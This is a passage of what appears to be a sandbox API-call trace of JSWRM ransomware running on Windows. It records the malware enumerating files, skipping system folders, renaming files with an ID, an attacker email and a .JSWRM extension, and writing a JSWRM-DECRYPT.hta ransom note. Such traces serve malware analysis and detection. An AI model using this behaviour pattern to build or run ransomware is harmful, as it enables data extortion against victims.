lpWideCharStr="msadox.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadox.dll", lpUsedDefaultChar=0x0) returned 10 [0069.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.167] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43c5ad98, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43c5ad98, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43c5ad98, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadox28.tlb", cAlternateFileName="")) returned 1 [0069.167] lstrcmpiW (lpString1="msadox28.tlb", lpString2=".") returned 1 [0069.167] lstrcmpiW (lpString1="msadox28.tlb", lpString2="..") returned 1 [0069.167] lstrcmpiW (lpString1="msadox28.tlb", lpString2="...") returned 1 [0069.167] lstrcmpiW (lpString1="msadox28.tlb", lpString2="windows") returned -1 [0069.167] lstrcmpiW (lpString1="msadox28.tlb", lpString2="recovery") returned -1 [0069.167] lstrcmpiW (lpString1="msadox28.tlb", lpString2="perflogs") returned -1 [0069.167] lstrcmpiW (lpString1="msadox28.tlb", lpString2="documents and settings") returned 1 [0069.167] lstrcmpiW (lpString1="msadox28.tlb", lpString2="$RECYCLE.BIN") returned 1 [0069.167] lstrcmpiW (lpString1="msadox28.tlb", lpString2="system volume information") returned -1 [0069.167] lstrcmpiW (lpString1="msadox28.tlb", lpString2="msocache") returned -1 [0069.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadox28.tlb", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadox28.tlb", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadox28.tlb", lpUsedDefaultChar=0x0) returned 12 [0069.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadox28.tlb", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadox28.tlb", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadox28.tlb", lpUsedDefaultChar=0x0) returned 12 [0069.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.168] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.168] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9167624875315808) returned 0 [0069.168] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.168] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.168] CloseHandle (hObject=0xffffffff) returned 1 [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0069.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0069.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f4d0 [0069.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.169] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0069.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.169] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437960ad, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x437960ad, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x437960ad, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x16400, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadrh15.dll", cAlternateFileName="")) returned 1 [0069.169] lstrcmpiW (lpString1="msadrh15.dll", lpString2=".") returned 1 [0069.169] lstrcmpiW (lpString1="msadrh15.dll", lpString2="..") returned 1 [0069.169] lstrcmpiW (lpString1="msadrh15.dll", lpString2="...") returned 1 [0069.169] lstrcmpiW (lpString1="msadrh15.dll", lpString2="windows") returned -1 [0069.169] lstrcmpiW (lpString1="msadrh15.dll", lpString2="recovery") returned -1 [0069.169] lstrcmpiW (lpString1="msadrh15.dll", lpString2="perflogs") returned -1 [0069.169] lstrcmpiW (lpString1="msadrh15.dll", lpString2="documents and settings") returned 1 [0069.169] lstrcmpiW (lpString1="msadrh15.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.169] lstrcmpiW (lpString1="msadrh15.dll", lpString2="system volume information") returned -1 [0069.169] lstrcmpiW (lpString1="msadrh15.dll", lpString2="msocache") returned -1 [0069.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadrh15.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadrh15.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadrh15.dll", lpUsedDefaultChar=0x0) returned 12 [0069.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadrh15.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadrh15.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadrh15.dll", lpUsedDefaultChar=0x0) returned 12 [0069.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.169] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437960ad, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x437960ad, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x437960ad, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x16400, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadrh15.dll", cAlternateFileName="")) returned 0 [0069.169] FindClose (in: hFindFile=0x231f80 | out: hFindFile=0x231f80) returned 1 [0069.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0069.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0069.170] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0069.170] lstrcmpiW (lpString1="DirectDB.dll", lpString2=".") returned 1 [0069.170] lstrcmpiW (lpString1="DirectDB.dll", lpString2="..") returned 1 [0069.170] lstrcmpiW (lpString1="DirectDB.dll", lpString2="...") returned 1 [0069.170] lstrcmpiW (lpString1="DirectDB.dll", lpString2="windows") returned -1 [0069.170] lstrcmpiW (lpString1="DirectDB.dll", lpString2="recovery") returned -1 [0069.170] lstrcmpiW (lpString1="DirectDB.dll", lpString2="perflogs") returned -1 [0069.171] lstrcmpiW (lpString1="DirectDB.dll", lpString2="documents and settings") returned -1 [0069.171] lstrcmpiW (lpString1="DirectDB.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.171] lstrcmpiW (lpString1="DirectDB.dll", lpString2="system volume information") returned -1 [0069.171] lstrcmpiW (lpString1="DirectDB.dll", lpString2="msocache") returned -1 [0069.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DirectDB.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DirectDB.dll", cchWideChar=12, lpMultiByteStr=0x345f2a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DirectDB.dll", lpUsedDefaultChar=0x0) returned 12 [0069.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DirectDB.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DirectDB.dll", cchWideChar=12, lpMultiByteStr=0x345f278, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DirectDB.dll", lpUsedDefaultChar=0x0) returned 12 [0069.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0069.171] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb3579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="en-US", cAlternateFileName="")) returned 1 [0069.171] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0069.171] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0069.171] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0069.171] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0069.171] lstrcmpiW (lpString1="en-US", lpString2="recovery") returned -1 [0069.171] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0069.171] lstrcmpiW (lpString1="en-US", lpString2="documents and settings") returned 1 [0069.171] lstrcmpiW (lpString1="en-US", lpString2="$RECYCLE.BIN") returned 1 [0069.171] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0069.171] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0069.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0069.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0069.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\en-us\\jswrm-decrypt.hta")) returned 0xffffffff [0069.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0069.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0069.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0069.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0069.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\en-us\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0069.173] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.173] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0069.174] CloseHandle (hObject=0x298) returned 1 [0069.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0069.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0069.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0069.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0069.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0069.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0069.174] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0069.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0069.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\system\\en-us\\jswrm-decrypt.hta")) returned 0x20 [0069.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0069.174] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0069.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0069.175] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb3579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fe3332d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName=".", cAlternateFileName="")) returned 0x231cc0 [0069.175] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.175] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b22f66e, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0cb3579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fe3332d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="..", cAlternateFileName="")) returned 1 [0069.175] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.175] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.175] FindNextFileW (in: hFindFile=0x231cc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fe3332d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fe3332d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fe3332d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.175] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.175] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.175] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.175] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.175] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.175] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.175] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.175] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.175] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.175] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0069.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0069.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: 